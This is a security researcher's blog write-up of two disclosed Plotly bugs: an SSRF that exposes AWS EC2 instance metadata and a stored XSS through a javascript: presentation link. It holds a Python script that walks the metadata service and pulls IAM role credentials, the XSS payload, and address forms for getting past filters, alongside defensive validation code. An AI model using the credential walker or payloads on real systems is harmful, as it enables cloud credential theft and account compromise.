Yasin Soliman


I'm Yasin, a security analyst and OSCP from the UK, interested in web application testing and red team operations. This is my personal blog for sharing research findings.

A pair of Plotly bugs: Stored XSS and AWS Metadata SSRF


Plotly is a data analytics and visualisation platform. Founded in 2012, the firm offers a range of products, including a collaborative web interface, API libraries, the Plotly.js library, on-premises services and various software utilities.


Plotly maintain a public bug bounty policy in parallel with a dedicated HackerOne program. I reached out to the team and started searching for bugs in early May. Let's take a look at two interesting reports, starting with the SSRF.

AWS EC2 Metadata Disclosure via SSRF

Brett Buerhaus' blog post discussing an SSRF vulnerability on the ESEA eSports platform caught my attention in April last year. After exploiting a URL filter bypass for reflected XSS, Brett learned of an interesting SSRF technique from @NahamSec: EC2 instance metadata disclosure.

Live instances on Amazon's Elastic Compute Cloud can retrieve information about themselves by querying the link-local metadata address (169.254.169.254). The service is only reachable from the instance itself, which is what makes a server-side request primitive valuable: the application fetches the address on the attacker's behalf. As a starting point, the URL below lists the endpoints available for inspection:

http://169.254.169.254/latest/meta-data/

The EC2 documentation for this topic contains a highly useful Metadata Categories table along with details on formatting and data types. Interestingly, I discovered that the metadata address can disclose AWS API credentials if the instance has an IAM role attached:

If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]
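To make that layout concrete, here is an added example (my own, not Plotly's or AWS's code) that walks a constructed copy of the metadata tree the way an SSRF probe would and pulls the credential document for any attached role. The `fetch` function is injected so the example runs offline; relaying each GET through the SSRF primitive instead is the only change needed against a live instance. The role name, account ID and credential values in `FAKE_IMDS` are made up.

```python
import json
from typing import Callable, Dict, Optional

IMDS_BASE = "http://169.254.169.254/latest/meta-data/"

# Constructed stand-in for the metadata service (all values are made up).
# Listings are newline-separated and a trailing "/" marks a directory,
# matching the layout the EC2 documentation describes.
FAKE_IMDS: Dict[str, str] = {
    "": "ami-id\nhostname\niam/\ninstance-id\n",
    "ami-id": "ami-00000000",
    "hostname": "ip-10-0-0-1.eu-west-1.compute.internal",
    "instance-id": "i-00000000000000000",
    "iam/": "info\nsecurity-credentials/\n",
    "iam/info": json.dumps({
        "Code": "Success",
        "InstanceProfileArn": "arn:aws:iam::111111111111:instance-profile/example-role",
    }),
    "iam/security-credentials/": "example-role\n",
    "iam/security-credentials/example-role": json.dumps({
        "Code": "Success",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLEEXAMPLE",
        "SecretAccessKey": "example-secret-key",
        "Token": "example-session-token",
        "Expiration": "2017-05-09T12:00:00Z",
    }),
}

Fetcher = Callable[[str], Optional[str]]


def fake_fetch(url: str) -> Optional[str]:
    """Offline stand-in for a GET relayed through the SSRF: body, or None for a 404."""
    if not url.startswith(IMDS_BASE):
        return None
    return FAKE_IMDS.get(url[len(IMDS_BASE):])


def walk(fetch: Fetcher, path: str = "") -> Dict[str, str]:
    """Recursively list the metadata tree below `path`.

    Returns {relative path: value} for every leaf. Names ending in "/" are
    directories and are descended into; anything else is fetched as a value.
    """
    found: Dict[str, str] = {}
    listing = fetch(IMDS_BASE + path)
    if listing is None:
        return found
    for name in listing.splitlines():
        if not name:
            continue
        child = path + name
        if name.endswith("/"):
            found.update(walk(fetch, child))
        else:
            value = fetch(IMDS_BASE + child)
            if value is not None:
                found[child] = value
    return found


def role_credentials(fetch: Fetcher) -> Dict[str, dict]:
    """Return {role name: credential document} for each IAM role on the instance.

    The listing at iam/security-credentials/ is the role name; the document
    below it carries AccessKeyId, SecretAccessKey and the session Token.
    """
    creds: Dict[str, dict] = {}
    roles = fetch(IMDS_BASE + "iam/security-credentials/") or ""
    for role in roles.split():
        body = fetch(IMDS_BASE + "iam/security-credentials/" + role)
        if body:
            creds[role] = json.loads(body)
    return creds


if __name__ == "__main__":
    for key, value in sorted(walk(fake_fetch).items()):
        print(f"{key}: {value[:60]}")
    for role, doc in role_credentials(fake_fetch).items():
        print(f"role {role}: AccessKeyId={doc['AccessKeyId']} expires {doc['Expiration']}")
```

Two caveats when using this against a real target. The trailing slash in a listing is the only signal that an entry is a directory, so a fetcher that strips or normalises paths will break the walk. And since November 2019 instances can be configured for IMDSv2, which only answers requests carrying a session token obtained with a PUT request; a GET-only SSRF like the one in this post does not reach the credentials on such instances.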

Whilst it was not possible to obtain API credentials in this case, the Plotly bug could be reproduced by an authenticated user by visiting a URL such as the following:

The external-import endpoint fetches the URL given in its url parameter server-side and opens the Graph Maker with the retrieved data. Because http://169.254.169.254 URLs were not filtered, the well-formatted metadata appeared in the Graph Maker:

Redacted image of Graph Maker with values obscured
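As an added example (mine, not Plotly's code), here is the check I would expect an import endpoint like this to apply, shown beside the permissive behaviour described above. DNS resolution is injected so it runs offline; `fake_resolve`, the hostnames and the addresses in `FAKE_DNS` are constructed for illustration.

```python
import ipaddress
from typing import Callable, List
from urllib.parse import urlsplit

Resolver = Callable[[str], List[str]]

METADATA_IP = ipaddress.ip_address("169.254.169.254")


def is_blocked_ip(ip: str) -> bool:
    """True for any address the fetcher must not reach: the metadata service
    and every other non-public range (RFC 1918, loopback, link-local, ...)."""
    addr = ipaddress.ip_address(ip)
    # ::ffff:169.254.169.254 is the same target in IPv4-mapped IPv6 form.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr == METADATA_IP
            or addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def vulnerable_accepts(url: str) -> bool:
    """The behaviour described in the post: any well-formed http(s) URL is fetched."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.hostname)


def hardened_accepts(url: str, resolve: Resolver) -> bool:
    """Accept only http(s) URLs whose host resolves exclusively to public addresses.

    The decision is made on the resolved addresses, not on the hostname text,
    so literal, decimal, IPv6-mapped and DNS-aliased forms of the metadata
    address all fall under one rule. Every returned address must pass: a name
    with one public and one private record is rejected.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addrs = resolve(parts.hostname)
    except (ValueError, OSError):
        return False
    return bool(addrs) and not any(is_blocked_ip(a) for a in addrs)


# Constructed DNS answers so the example runs offline. Real code would call
# socket.getaddrinfo, which also accepts the numeric forms handled below.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "metadata.attacker.test": ["169.254.169.254"],        # A record aimed at IMDS
    "dual.attacker.test": ["93.184.216.34", "10.0.0.5"],  # one public, one internal
}


def fake_resolve(host: str) -> List[str]:
    """Constructed resolver: table lookup, decimal literal, or plain IP literal."""
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    if host.isdigit():  # http://2852039166/ is how inet_aton spells 169.254.169.254
        return [str(ipaddress.IPv4Address(int(host)))]
    return [str(ipaddress.ip_address(host))]  # raises ValueError if not a literal


if __name__ == "__main__":
    for candidate in [
        "http://169.254.169.254/latest/meta-data/",
        "http://2852039166/latest/meta-data/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "http://metadata.attacker.test/latest/meta-data/",
        "http://dual.attacker.test/",
        "https://example.com/data.csv",
    ]:
        print(f"{candidate:52} vulnerable={vulnerable_accepts(candidate)!s:5} "
              f"hardened={hardened_accepts(candidate, fake_resolve)}")
```

Two gaps remain even with this check in place. A resolver that answers with a public address at validation time and a private one at connect time (DNS rebinding) defeats any check that runs before the request; the address test has to be applied to the socket the fetcher actually opens. And HTTP redirects need every hop revalidated, or redirects disabled, since a public host can simply 302 to the metadata address.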

Stored XSS via Presentation Text Link

I came across Plotly Presentations during my wider reconnaissance of the firm's properties and started to explore the Spectacle Editor tool.

Co-authored by Formidable Labs, Spectacle Editor is:

an Electron based app for creating, editing, saving, and publishing Spectacle presentations [...] a joint effort between Formidable and Plotly.

Links can be added to text elements in a Spectacle presentation, and the platform accepted them without checking the URL scheme. After pasting javascript:prompt(document.domain) into the Link field and uploading to Plotly, I selected the test hyperlink:

Stored XSS on Plotly web platform

Straightforward stored XSS via a trusted URL element: the javascript: link runs in the origin of the Plotly web platform whenever a viewer of the presentation clicks it. After submitting the initial HackerOne report, I later exported and attached the Spectacle JSON file to assist the Plotly team with their investigation and fix.
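Here is an added example (mine, not Spectacle's or Plotly's code) of the server-side check that would have rejected this link before the presentation was stored. It applies the same preprocessing a browser applies to an href before parsing (leading and trailing control characters and spaces stripped, tabs and newlines removed anywhere), so obfuscated spellings of `javascript:` are judged the way the browser would judge them. `SAMPLE_PRESENTATION` and its `href` key are constructed for illustration and are not Spectacle's real export format.

```python
import re
from typing import Any, Optional, Tuple

ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})

# C0 control characters and space: the browser's URL parser strips these from
# both ends of an href and removes every tab, LF and CR anywhere inside it.
_STRIP_EDGES = "".join(chr(c) for c in range(0x21))
_SCHEME_RE = re.compile(r"([A-Za-z][A-Za-z0-9+.\-]*):")


def safe_href(raw: str) -> Optional[str]:
    """Return the link if it is relative or uses an allowed scheme, else None.

    The value is normalised as the browser would normalise it, so
    ' javascript:', 'JavaScript:' and 'java<TAB>script:' are all recognised as
    the javascript: scheme and rejected.
    """
    url = raw.strip(_STRIP_EDGES).replace("\t", "").replace("\n", "").replace("\r", "")
    m = _SCHEME_RE.match(url)
    if m is None:
        return url  # no scheme: a relative link cannot carry javascript:
    return url if m.group(1).lower() in ALLOWED_SCHEMES else None


def sanitize_links(node: Any, link_keys=frozenset({"href"})) -> Tuple[Any, int]:
    """Walk a nested dict/list structure and drop every disallowed link.

    Returns a sanitised copy and the number of links removed. The key name
    "href" is an assumption for this example, not Spectacle's real schema.
    """
    if isinstance(node, dict):
        out, removed = {}, 0
        for key, value in node.items():
            if key in link_keys and isinstance(value, str):
                safe = safe_href(value)
                if safe is None:
                    removed += 1  # drop the attribute rather than keep a bad URL
                    continue
                out[key] = safe
            else:
                out[key], n = sanitize_links(value, link_keys)
                removed += n
        return out, removed
    if isinstance(node, list):
        cleaned = [sanitize_links(item, link_keys) for item in node]
        return [c for c, _ in cleaned], sum(n for _, n in cleaned)
    return node, 0


# Constructed presentation, not a real Spectacle export: one benign link and
# the payload from the report.
SAMPLE_PRESENTATION = {
    "slides": [{
        "children": [
            {"type": "Text", "props": {"text": "docs", "href": "https://plot.ly/"}},
            {"type": "Text", "props": {"text": "test hyperlink",
                                       "href": "javascript:prompt(document.domain)"}},
        ],
    }],
}

if __name__ == "__main__":
    cleaned, removed = sanitize_links(SAMPLE_PRESENTATION)
    print(f"removed {removed} link(s)")
    for slide in cleaned["slides"]:
        for child in slide["children"]:
            print(child["props"])
```

Output escaping does not help with this class of bug: the value is used as a genuine URL, so the defence is an allow-list of schemes applied before the link is persisted, and again when rendering presentations that were stored before the fix.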

Conclusion

I would like to commend Jody from Engineering for the swift handling of reports submitted to the Plotly program, and the Development team for the quick fix.

For interested researchers, I'd like to mention that Plotly also pay on triage for valid reports, a practice worth encouraging among program operators.

Research timeline

The following timestamps are provided in GMT. Once the Plotly program becomes public, the applicable HackerOne reports will be disclosed.

SSRF via External URL Import leading to AWS Metadata Disclosure

  • 2017-05-09 09:19 – issue reported
  • 2017-05-10 17:41 – triaged & bounty issued
  • 2017-05-17 22:25 – issue resolved

Stored XSS via Presentation Text Link

  • 2017-05-02 16:49 – issue reported
  • 2017-05-03 19:33 – triaged & bounty issued
  • 2017-05-25 21:30 – issue resolved